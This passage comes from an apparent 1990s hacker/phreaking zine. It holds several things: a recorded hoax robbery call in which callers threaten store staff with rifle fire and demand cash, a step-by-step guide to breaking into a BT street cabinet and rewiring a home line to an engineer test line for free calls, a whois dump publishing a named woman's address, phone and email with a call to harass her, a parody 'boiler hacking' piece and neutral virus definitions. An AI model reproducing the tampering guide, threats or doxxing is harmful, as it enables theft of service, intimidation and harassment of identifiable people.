457.6125 467.8375 Washington, DC area 460.8875 465.8875 Nationwide 461.0875 466.0875 UNKNOWN OH area 461.8125 UNKNOWN UNKNOWN OH area 464.3750 UNKNOWN Headquarters 464.5125 UNKNOWN Columbus, OH area White Castle 457.6000 467.8250 UNKNOWN OH area 461.8125 UNKNOWN Columbus, OH area - Have Phun! ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 2. Robbing Stores With Phones, A Real Example : The CrackHouse ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ the following is a transcript of a teleconference robbery of a Wawa convience store, all names remain the same to fully implicate the guilty. the sad thing is this is an actual transcript. dk: Hello, listen very carefully I'm not going to repeat myself. manager: Who is this? dk: Don't worry about that, listen carefully, don't interrupt. Are you the manager and if so what is your name? manager: yes, i'm the manager, my names kathy. dk:ok kathy, look across the street do you see the apartment complex directly opposite you? manager: yes. dk: i have a man stationed in a car in that complex's parking lot. he has a high powerd assault rifle aimed at the individual behind the counter. i have another man stationed adjacent to the Wawa with a cellular phone. what's the individual's name behind the cash register? manager: her names Lori, please don't hurt anyone. dk: no ones going to get hurt as long as you shut the fuck up and do exactly as i say. instruct lori that she is to keep her hands on the counter at all times, with her palms laid out flat. shes only to move when she must make change for a customer, do not alert any customers in the store kathy. do you understand me? manager: yes i understand, hold on. (kathy then instructs lori) please promise you won't hurt anyone? please. dk: no ones getting hurt, now we got 30 seconds kathy from when i say go, when i say go you grab a plastic bag, fill it with all the money in the register furthest from the doorway and open the back door and leave all the money there, then shut and lock the door. manager: ok ok, do you want the foodstamps? dk: no! the foodstamps go in a seperate bag. sulfur: and get me a gatorade. manager: a gatorade? what kind? sulfur: if it's not a large im gonna open fire. manager: ok just please don't hurt anyone. dk: ok kathy, go! (theres a rustling of bags and some background noise) manager: ok, done, now what? dk: kathy have you made any attempt to contact any form of law enforcement? manager: no i promise. sulfur: she's lying. dk: kathy, do you know what a digital voice analyzer is? (dk is now completely talking out his ass) manager: no. dk: well we have one connected to a polygraph examiner and its telling us your lying kathy. manager: i swear to you im not lying! sulfur: shoot her dk: kathy your lying. manager: no no im not! dk: your lying kathy, mike, open fire open fire! z: open fire!! manager: LORI!! DUCK!! *click* everyone on the conference call: BAHAHAHAHAHAHAHAHAHA ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 3. How To Rewire Your House For Free Phone Calls : WildFire ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ (-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-) How To Rewire You House For Free Fone Calls In The U.K (-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-) By WildFire of AWOL The aim is to teach you how to rewire your house to an engineer test line for free Fone calls, you dont need any little coloured boxes etc, all you need is a bit of patience and a lot of guts =) EQUIPMENT -: A B.T line into your house Socket wrench with 1/2 inch bit Offical looking enginner clothing (lumi jacket) C.B radios (Optional) STEP 1: We need to find out some information about the your line (Note : these numbers are not anything to do with your Fone number) what we need to know is how it runs back to B.T Eg. The pole outside your house is the first contact then it runs underground to A big green box, these are called DP's (Disconection/Connection points) Fig 1. House -----> Pole ------> Green box ------> B.T \/ \/ Prefix = 46 95 The way to find this out is by sabotaging your house's fone line to get an engininer to pay you a visit . With him he should bring a nice filo-fax with all his jobs in (all the places he's got to visit and their line info etc.) You now Have 3 options (i) KILL HIM!! and steal all his neat stuff * (ii) Act Intrested in his work and ask how he knows which line is yours say you want to do work experience in B.T etc/etc and he might show it to you and even explain it to you. (iii) Sabotage your line in such a way he's got to go up your pole , while he's trying to work out what the fuck you've done have a look at the filo-fax and write down all your info. * Not Recommended There are probally other ways to get your info ie. Bullshiting the B.T depot. or operators but they are not known my me , if anyone has any ideas i'd like to hear from them... STEP 2 : Decode When you have the filo-fax in your hands flick through it, near the end should be a page with your surname and telephone number.. below this should be the following .......... PCP E P DP PR 15 15 360 1922 4 What we are concerned with are the DP, PCP and P DP -- This is the pole, you can check this by going outside and looking at it . PCP/E -- This is the big green box have a look around your neighbourhood not to be confused with cable green boxes !!. P -- This is where your wire-pair are in the green box. The other letters are probally what contact your wire-pair is on the pole etc. Now You're Set To Go On An Adventure .. Wait until darkness falls , Put on your funky glow in the dark jackets, put the socket wrench in your pocket and take a visit to your local greener. Look around for nosey OAP's or other paranoid people. I actually had the shit kicked out of me by a large bloke who thought I was breaking into his house because I was looking very suspect walking around the streets stopping at the end of his road near the green box, ouch! On the front of the box there should be 2 diamond shaped things, pull out the wrench and undo them , the box should now open with ease.. You Should see loads of wires going all over the place. On the back of the left door there should be a white box (like you the one you plug your fone into back home) this is what the Enginerer uses for calls this is what we are going to swap with your house pair . How To Find Your Pair: There should be transparent plastic struts going from top to bottom, they have holes (where the wires come through) with very tiny numbers near them. The Struts are divided up into hundreds , So if your "P" was 360 you go along to the third strut and down until you find the tiny number 60 next to a hole. (see fig 1.18291739)In this hole should be some wire's, with luck they should be yours. Pull the wires out of the white-box and reconnect it to the wire pair going to your house. (the use of radios for checking might be a good idea) Fig 1.18291739 100-200 200-300 300-400 400-500 500-600 600-700 700-800 800-900 Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý-360 Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Go Home And See if You Have A Dial Tone . Congratulations.... Your house is now ready for free calls .. Dial 175 and get your new fone Number Your old line will be in limbo so you might as well stop paying line rental, so tell B.T to disconnect it. Notes for use: If You're Leaving the dodgy line permanent then make sure you hide the wires well.. If you are going to get your old line cut-off then make sure all your wiring is back as it was before. Don't tell Stupid People your number. Don't call Operators etc. When we used this method we only connected the dodgy line when we needed it, so I don't know what will happen if left on a permenent basis ???!"* The information in this file came from alot of Trial & Error so some facts may be incorrect.. (Anyway it worked for us!). ----------- WildFire ----------- ----------- AWOL '97 ----------- ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ =============================================================================== ==[ MISC ]=====================[ .SECTION D. ]=======================[ MISC ]== =============================================================================== ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 1. Hacking Electrical Items Part 2, The Sequel : Tetsu Khan ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ LAst TiME wE WuZ Hax0Rin' ToAsTAz, So foR Dis TiMe i BeeN ThINkin On WhUT wE ShOUld hAx0R, aNd I ThOUghT, "eYe WiLL WrItE AbOuT....BOiLAhS!!! YeS, ThOsE boILaHs yEw FiNd In yOuR BaSEmEnt!!" AnD So I StArTed To pLaY ArouND WifF Muh BoiLAh AT h0me, NoW Yew caN REwt YoUr BoILah Tew!!! FiNDiNg OuT dA OS ThaT ThA BoiLaH iZ RuNNiN' -------------------------------------------- yEw Can DeW ThIS 3 WayZ... 1: LeWk FoR a StIcKA On It DaT Sez. 2: FiNd A CoNsOle On DA BoiLAh, ThEn, If IT hAs A kEYbOArd (DepEndZ oN MaNuFAcTuReR) tYpE "uname -a" AnD It WiLL Tell YeW! 3: FiNd Da ManUaL FoR YouR BOilaH (easiest way) WhEn YoU KnOw YoUr BoILaHs oPeRATinG SyStEm, yEw cAN PRocEEd To Hax0R It... --------------------------------------------------------------------------- Hax0RinG a BoILaH KaN BeE VeRy DangERous, LiKE Hax0Rin' A nuKelear PoWaHH sTAtIon, So MaKe sHuRe YeW dO ThE fOLLowiNG... 1: PuT oN PrOtECtivE CloThInG, LikE GloVeS, AnD a hAT, aNd MaYBe a sCarF, tHis Is BeCoS BaSEmEnts CaN bE CooOLD, aNd YEw WouLDnt WanT To CaTch A ChiLL wOULd YeW? 2: MaKE ShURe YeW HaVE A SpAnnEr Or WreNCH, As YoU WiLL NeEd ThEsE tO FiNd hIdDEn pOrTz AnD TeW Eye-PeE SpoOF fRom TruSteD HoStS (liKe a SinK, oR A pIpE, Or A WaSHing MaChInE) LiKE WiV ToAsTeRz, We wILL fiRsT nEeD tO FiNd HiDDeN PoRtS, So wE NeEd To ScAn FoR tHem, bOilAhz ArE BiGGer tHan tOASterz, sO ThiS MaY tAke SoMe TiMe. YeW cAn LeWk FoR SucH HiDDen PoRtS bY dOIng ThEsE tHinGs... 1: LeWKiNg ArOunD ThE BoILaH wIV yOUR EyeS. 2: TrAcInG PiPeS aLL ArOuND yOuR hOuSe (bit like traceroute programs do) 3: UsInG StEalTh TEkNiquEs By HidInG ArOuND yOuR hOuSE AnD LIsTENinG fOr WaTeR, liKE FrOm TaPs aNd StUFf... If YoU dOnT FiNd AnY HIdDen PoRtS, ThEN YeW cAN JuST LoGiN FrOM a WaSHiNG MaChIne, Or OtHeR tRUstEd HoSt On ThE NeTwOrK, wHeN yOu COnnEcT tO tHa BoiLaH FRoM tHe WasHiNg MaChINe YeW wiLL sEe sOmeThInG LiKe ThIs... +-------------------+ | GEneRaL eLeKTrIk | | M:0225 | | S:b4588 | | T:02 | +-------------------+ BoiLaH OS RelEasE 2.54 (bIg BaAAadAss BoILaH) login: BoiLaH password: <--- We AttEmPtid ThE DeFauLt "BoiLaH" ------------------------------------------------------------ L0ghINn GRaNTiD *************** ------------------------------------------------------------ WeLKoMe To bOiLAh [BOPR] bOiLiNg OpErAtIoNS PlaN rEsPonSe ------------------------------------------------------------ login on tty[wAShInG mAcHiNE] last login from BaTHrEwm.COM on tty[ShOwEr] at 7:43p.m. 1: sHuTDoWn 2: CoLd WaTeR 3: hOt wAtEr 4: UNiX TyPE SheLL ENViRONMEnT If YeW GhET THiS YEW ArE COOL)(#*$ Ok NoW CHEwZe NuMbAhh 4, ThEn YeWsE ThIS uniVeRSaL BoiLAhh ExPLoiT... % fuck yew eye am eleet and k-r4d 'cos muh name iz ZeroCool! fuck : command not found % whoami root % tHe bEst tImEs To ReWT BoILaHs Is lAtE aT nIgHt WhEn No-OnE Is LOggEd-In, CoS In ThA dAY, yEw GEt uSeRs LoGgEd iN To DoWLoAd WatEr AnD ShIt. eYe WiLL KoNItuE wItH oTheR ExAMplEs NeXt TiMe! T_K ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 2. Virus Definitions : so1o ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ This is for all you lame fucks out there who say I infect your systems with viruses, even when the only malicious shit I code are Windoze killers, anyway here are a few definitions, just so you know what you're on about next time =) What are computer viruses (and why should I worry about them)? -------------------------------------------------------------- According to Fred Cohen's well-known definition, a COMPUTER VIRUS is a computer program that can infect other computer programs by modifying them in such a way as to include a (possibly evolved) copy of itself. Note that a program does not have to perform outright damage (such as deleting or corrupting files) in order to to be called a "virus". However, Cohen uses the terms within his definition (e.g. "program" and "modify") a bit differently from the way most anti-virus researchers use them, and classifies as viruses some things which most of us would not consider viruses. Many people use the term loosely to cover any sort of program that tries to hide its (malicious) function and tries to spread onto as many computers as possible. (See the definition of "Trojan".) Be aware that what constitutes a "program" for a virus to infect may include a lot more than is at first obvious - don't assume too much about what a virus can or can't do! These software "pranks" are very serious; they are spreading faster than they are being stopped, and even the least harmful of viruses could be fatal. For example, a virus that stops your computer and displays a message, in the context of a hospital life-support computer, could be fatal. Even those who created the viruses could not stop them if they wanted to; it requires a concerted effort from computer users to be "virus-aware", rather than the ignorance and ambivalence that have allowed them to grow to such a problem. What is a Trojan Horse? ----------------------- A TROJAN HORSE is a program that does something undocumented which the programmer intended, but that the user would not approve of if he knew about it. According to some people, a virus is a particular case of a Trojan Horse, namely one which is able to spread to other programs (i.e., it turns them into Trojans too). According to others, a virus that does not do any deliberate damage (other than merely replicating) is not a Trojan. Finally, despite the definitions, many people use the term "Trojan" to refer only to a *non-replicating* malicious program, so that the set of Trojans and the set of viruses are disjoint. What are the main types of PC viruses? -------------------------------------- Generally, there are two main classes of viruses. The first class consists of the FILE INFECTORS which attach themselves to ordinary program files. These usually infect arbitrary .COM and/or .EXE programs, though some can infect any program for which execution is requested, such as .SYS, .OVL, .PRG, & .MNU files. File infectors can be either DIRECT ACTION or RESIDENT. A direct- action virus selects one or more other programs to infect each time the program which contains it is executed. A resident virus hides itself somewhere in memory the first time an infected program is executed, and thereafter infects other programs when *they* are executed (as in the case of the Jerusalem) or when certain other conditions are fulfilled. The Vienna is an example of a direct-action virus. Most other viruses are resident. The second category is SYSTEM or BOOT-RECORD INFECTORS: those viruses which infect executable code found in certain system areas on a disk which are not ordinary files. On DOS systems, there are ordinary boot-sector viruses, which infect only the DOS boot sector, and MBR viruses which infect the Master Boot Record on fixed disks and the DOS boot sector on diskettes. Examples include Brain, Stoned, Empire, Azusa, and Michelangelo. Such viruses are always resident viruses. Finally, a few viruses are able to infect both (the Tequila virus is one example). These are often called "MULTI-PARTITE" viruses, though there has been criticism of this name; another name is "BOOT-AND-FILE" virus. FILE SYSTEM or CLUSTER viruses (e.g. Dir-II) are those which modify directory table entries so that the virus is loaded and executed before the desired program is. Note that the program itself is not physically altered, only the directory entry is. Some consider these infectors to be a third category of viruses, while others consider them to be a sub-category of the file infectors. What is a stealth virus? ------------------------ A STEALTH virus is one which hides the modifications it has made in the file or boot record, usually by monitoring the system functions used by programs to read files or physical blocks from storage media, and forging the results of such system functions so that programs which try to read these areas see the original uninfected form of the file instead of the actual infected form. Thus the viral modifications go undetected by anti-viral programs. However, in order to do this, the virus must be resident in memory when the anti-viral program is executed. Example: The very first DOS virus, Brain, a boot-sector infector, monitors physical disk I/O and re-directs any attempt to read a Brain-infected boot sector to the disk area where the original boot sector is stored. The next viruses to use this technique were the file infectors Number of the Beast and Frodo (= 4096 = 4K). Countermeasures: A "clean" system is needed so that no virus is present to distort the results. Thus the system should be built from a trusted, clean master copy before any virus-checking is attempted; this is "The Golden Rule of the Trade." With DOS, (1) boot from original DOS diskettes (i.e. DOS Startup/Program diskettes from a major vendor that have been write-protected since their creation); (2) use only tools from original diskettes until virus-checking has completed. What is a polymorphic virus? ---------------------------- A POLYMORPHIC virus is one which produces varied (yet fully operational) copies of itself, in the hope that virus scanners will not be able to detect all instances of the virus. One method to evade signature-driven virus scanners is self-encryption with a variable key; however these viruses (e.g. Cascade) are not termed "polymorphic," as their decryption code is always the same and thus can be used as a virus signature even by the simplest, signature- driven virus scanners (unless another virus or program uses the identical decryption routine). One method to make a polymorphic virus is to choose among a variety of different encryption schemes requiring different decryption routines: only one of these routines would be plainly visible in any instance of the virus (e.g. the Whale virus). A signature-driven virus scanner would have to exploit several signatures (one for each possible encryption method) to reliably identify a virus of this kind. A more sophisticated polymorphic virus (e.g. V2P6) will vary the sequence of instructions in its copies by interspersing it with "noise" instructions (e.g. a No Operation instruction, or an instruction to load a currently unused register with an arbitrary value), by interchanging mutually independent instructions, or even by using various instruction sequences with identical net effects (e.g. Subtract A from A, and Move 0 to A). A simple-minded, signature-based virus scanner would not be able to reliably identify this sort of virus; rather, a sophisticated "scanning engine" has to be constructed after thorough research into the particular virus. The most sophisticated form of polymorphism discovered so far is the MtE "Mutation Engine" written by the Bulgarian virus writer who calls himself the "Dark Avenger". It comes in the form of an object module. Any virus can be made polymorphic by adding certain calls to the assembler source code and linking to the mutation-engine and random-number-generator modules. The advent of polymorphic viruses has rendered virus-scanning an ever more difficult and expensive endeavor; adding more and more search strings to simple scanners will not adequately deal with these viruses. What is a companion virus? -------------------------- A COMPANION virus is one which, instead of modifying an existing file, creates a new program which (unknown to the user) gets executed by the command-line interpreter instead of the intended program. (On exit, the new program executes the original program so that things will appear normal.) The only way this has been done so far is by creating an infected .COM file with the same name as an existing .EXE file. Note that those integrity checkers which look only for *modifications* in *existing* files will fail to detect such viruses. (Note that not all researchers consider this type of malicious code to be a virus, since it does not modify existing files.) Miscellaneous Jargon and Abbreviations -------------------------------------- BSI = Boot Sector Infector: a virus which takes control when the computer attempts to boot (as opposed to a file infector). CMOS = Complementary Metal Oxide Semiconductor: A memory area that is used in AT and higher class PCs for storage of system information. CMOS is battery backed RAM (see below), originally used to maintain date and time information while the PC was turned off. CMOS memory is not in the normal CPU address space and cannot be executed. While a virus may place data in the CMOS or may corrupt it, a virus cannot hide there. DOS = Disk Operating System. We use the term "DOS" to mean any of the MS-DOS, PC-DOS, or DR DOS systems for PCs and compatibles, even though there are operating systems called "DOS" on other (unrelated) machines. MBR = Master Boot Record: the first Absolute sector (track 0, head 0, sector 1) on a PC hard disk, that usually contains the partition table (but on some PCs may simply contain a boot sector). This is not the same as the first DOS sector (Logical sector 0). RAM = Random Access Memory: the place programs are loaded into in order to execute; the significance for viruses is that, to be active, they must grab some of this for themselves. However, some virus scanners may declare that a virus is active simply when it is found in RAM, even though it might be simply left over in a buffer area of RAM rather than truly being active. TOM = Top Of Memory: the end of conventional memory, an architectural design limit at the 640K mark on most PCs. Some early PCs may not be fully populated, but the amount of memory is always a multiple of 64K. A boot-record virus on a PC typically resides just below this mark and changes the value which will be reported for the TOM to the location of the beginning of the virus so that it won't get overwritten. Checking this value for changes can help detect a virus, but there are also legitimate reasons why it may change. A very few PCs with unusual memory managers/settings may report in excess of 640K. TSR = Terminate but Stay Resident: these are PC programs that stay in memory while you continue to use the computer for other purposes; they include pop-up utilities, network software, and the great majority of viruses. These can often be seen using utilities such as MEM, MAPMEM, PMAP, F-MMAP and INFOPLUS. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 3. Fun With whois, sinnerz.com : so1o ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Lewk WhuT eyE FoUnd... phish:~> whois sinerz.com [rs.internic.net] SIN (SINNERZ3-DOM) 130 105th Ave. S.E. Apt. 218 Bellevue, Wa 98004 USA Domain Name: SINNERZ.COM Administrative Contact: Kimminau, Suzette (SK2455) evilchic@NWLINK.COM (206)454-7176 Technical Contact, Zone Contact: Schmittel, Blair (BS469) blair@CYBER-NAUT.COM (801)654-3139 Record last updated on 26-Mar-97. Record created on 26-Mar-97. Domain servers in listed order: STRECH.CYBER-NAUT.COM 192.41.77.5 ITIS.EASILINK.COM 192.41.78.2 The InterNIC Registration Services Host contains ONLY Internet Information (Networks, ASN's, Domains, and POC's). Please use the whois server at nic.ddn.mil for MILNET Information. phish:~> fwhois sinnerz.com@nic.ddn.mil [nic.ddn.mil] No match for "SINNERZ.COM". Please be advised that this whois server only contains DOD Information. All INTERNET Domain, IP Network Number, and ASN records are kept in the Internet Registry, RS.INTERNIC.NET. ------------------------------------------------------------------------------- =--> S.I.N : [S] cared sh [I] tless lame fucks not-so-a [N] onymous. <--= ------------------------------------------------------------------------------- If sIn play this down as fake, why not phone up Evil Chic and ask if Suzey is there? You will soon find out the truth =) Expect details of all sIn members soon. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 4. Hacking Space Shuttles, Abort Codes : NailGun ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Okay, if you ever decide to hack a space shuttle (*.arc.nasa.gov is hacked very frequently) and you actually plan it all out, make sure you collect all the parts of this "mini-guide" of little things that are important and you will need to know, this section concerns.... SPACE SHUTTLE ABORT MODES ------------------------- Space Shuttle launch abort philosophy aims toward safe and intact recovery of the flight crew, orbiter and its payload. Abort modes include: * Abort-To-Orbit (ATO) -- Partial loss of main engine thrust late enough to permit reaching a minimal 105-nautical mile orbit with orbital maneuvering system engines. * Abort-Once-Around (AOA) -- Earlier main engine shutdown with the capability to allow one orbit around before landing at Edwards Air Force Base, Calif.; White Sands Space Harbor (Northrup Strip), N.M.; or the Shuttle Landing Facility (SLF) at Kennedy Space Center, Fla.. * Trans-Atlantic Abort Landing (TAL) -- Loss of two main engines midway through powered flight would force a landing at Banjul, The Gambia; Ben Guerir, Morocco; or Moron, Spain. * Return-To-Launch-Site (RTLS) -- Early shutdown of one or more engines and without enough energy to reach Banjul would result in a pitch around and thrust back toward KSC until within gliding distance of the SLF. STS-35 contingency landing sites are Edwards AFB, White Sands, Kennedy Space Center, Banjul and Ben Guerir, Moron. Next time we will probably look at the payloads of space shuttles, l8r. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 5. Country Domain Listing : SirLance ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Listing Of Domains By Country, like *.fr *.uk etc. etc. AD - Andorra - Andorre AE - Imarata al Arabiya al Muttahidah - Ittihad al Imirat alArabiya - United Arab Emirates AF - Afghanistan - Afghanestan AG - Antigua and Barbuda AI - Anguilla AL - Shqipëria - Albania AM - Armenia - Hayastan AN - Netherlands Antilles - Nederlandse Antillen AO - Angola AQ - Antarctica AR - Argentina AS - American Samoa AT - Austria - Osterreich AU - Australia AW - Aruba AZ - Azerbaijan - Azerbaycan BA - Bosnia and Herzegovina - Bosna i Hercegovina BB - Barbados BD - Bangladesh BE - Belgium - Belgique - Belgie BF - Burkina BG - Bulgaria BH - Bahrain - Bahrayn BI - Burundi BJ - Benin BM - Bermuda BN - Brunei BO - Bolivia BR - Brazil - Brasil BS - Bahamas BT - Bhutan BV - Bouvet Island - Bouvetoya BW - Botswana BY - Belarus - Byelarus' BZ - Belize CA - Canada CC - Cocos (Keeling) Islands (Australia) CF - Central Africa CG - Congo CH - Switzerland - Schweiz - Suisse - Svizzera - Svizra - Helvetia CI - Cote d'Ivoire CK - Cook Islands CL - Chile CM - Cameroon CN - China CO - Colombia CR - Costa Rica CS - Czechoslovakia CU - Cuba CV - Cape Verde - Cabo Verde CX - Christmas Island (Australia) CY - Cyprus CZ - Czech Republic - Cechy DD - Germany - Deutschland DE - Germany - Deutschland DJ - Djibouti DK - Denmark - Danmark DM - Dominica DO - Dominican Republic - Republica Dominicana DZ - Algeria - Jaza'ir EC - Ecuador EE - Estonia - Eesti EG - Egypt - Misr EH - Western Sahara ER - Eritrea ES - Spain - Espana ET - Ethiopia - Ityop'iya FI - Finland - Suomi FJ - Fiji FK - Falkland Islands FM - Micronesia FO - Faroe Islands - Faroyar FR - France FX - Metropolitan France GA - Gabon GB - United Kingdom GD - Grenada GE - Georgia - Sak'art'velo GF - French Guiana - Guyane GH - Ghana GI - Gibraltar (UK) GL - Greenland - Kalaallit Nunaat GM - The Gambia GN - Guinea - Guinee GP - Guadaloupe (France) GQ - Equatorial Guinea - Guinea Ecuatorial GR - Greece - Ellas GS - South Georgia GT - Guatemala GU - Guam GW - Guinea-Bissau - Guine-Bissau GY - Guyana HK - Hong Kong (UK) HM - Heard Island and McDonald Islands (Australia) HN - Honduras HR - Croatia - Hrvatska HT - Haiti HU - Hungary - Magyarorszag ID - Indonesia IE - Ireland - Éire IL - Israel - Yisra'el IN - India - Bharat IO - Indian Ocean Territory (UK) IQ - Iraq IR - Iran IS - Island - Iceland IT - Italy - Italia JM - Jamaica JO - Jordan - Urdun JP - Japan KE - Kenya KG - Kyrgyzstan KH - Cambodia - Kampuchea KI - Kiribati KM - Comoros - Comores KN - Saint Kitts and Nevis KP - Korea - Choson KR - Korea KW - Kuwait - Kuwayt KY - Cayman Islands KZ - Kazakhstan LA - Laos LB - Lebanon - Lubnaniyah LC - Saint Lucia LI - Liechtenstein LK - Sri Lanka LR - Liberia LS - Lesotho LT - Lithuania - Lietuva LU - Luxembourg LV - Latvia - Latvija LY - Libya - Libiya MA - Morocco - Maghrib MC - Monaca MD - Moldova MG - Madagascar MH - Marshall Islands MK - Macedonia - Makedonija ML - Mali MM - Burma - Myanma MN - Mongolia - Mongol Uls MO - Macau MP - Northern Mariana Islands MQ - Martinique (France) MR - Mauritania - Muritaniyah MS - Montserrat MT - Malta MU - Mauritius MV - Maldives MW - Malawi MY - Malaysia MZ - Mozambique - Mocambique NA - Namibia NC - New Caledonia - Nouvelle-Caledonie NE - Niger NF - Norfolk Island (Australia) NG - Nigeria NI - Nicaragua NL - Netherlands - Nederland NO - Norway - Norge NP - Nepal NR - Nauru NU - Niue NZ - New Zealand OM - Oman - Uman PA - Panama PE - Peru PF - French Polynesia - Polynesie Francaise PG - Papua New Guinea PH - Philippines - Pilipinas PK - Pakistan PL - Poland - Polska PM - Saint-Pierre et Miquelon PN - Pitcairn Islands PR - Puerto Rico PT - Portugal PW - Palau - Belau PY - Paraguay QA - Qatar RE - Reunion RO - Romania RU - Russia - Rossiya RW - Rwanda SA - Saudi Arabia - Arabiya as Suudiyah SB - Solomon Islands SC - Seychelles SD - Sudan SE - Sweden - Sverige SG - Singapore - Singapura SH - Saint Helena (UK) SI - Slovenia - Slovenija SJ - Svalbard og Jan Mayen SK - Slovakia - Slovensko SL - Sierra Leone SM - San Marino SN - Senegal SO - Somalia SR - Suriname ST - Sao Tome e Principe SU - Soviet Union - Sovietskiy Soyuz SV - El Salvador SY - Syria - Suriyah SZ - Swaziland TC - Turks and Caicos Islands TD - Chad - Tchad TF - Southern and Antarctic Lands - Terre Australes et Antarctiques TG - Togo TH - Thailand TJ - Tajikistan - Tojikiston TK - Tokelau (New Zealand) TM - Turkmenistan - Tiurkmenostan TN - Tunisia - Tunis TO - Tonga TP - Timor TR - Turkey - Turkiye TT - Trinidad and Tobago TV - Tuvalu TW - Taiwan - T'ai-wan TZ - Tanzania UA - Ukraine - Ukrayina UG - Uganda UM - United States Minor Outlying Islands US - United States of America UY - Uruguay UZ - Uzbekistan - Uzbekiston VA - Holy See VC - Saint Vincent and the Grenadines VE - Venezuela VG - Virgin Islands (UK) VI - Virgin Islands (USA) VN - Vietnam - Viet Nam VU - Vanuatu WF - Wallis et Futuna WS - Samoa YD - Yemen YE - Yemen YT - Mayotte (France) YU - Yugoslavia ZA - South Africa ZM - Zambia ZR - Zaire ZW - Zimbabwe 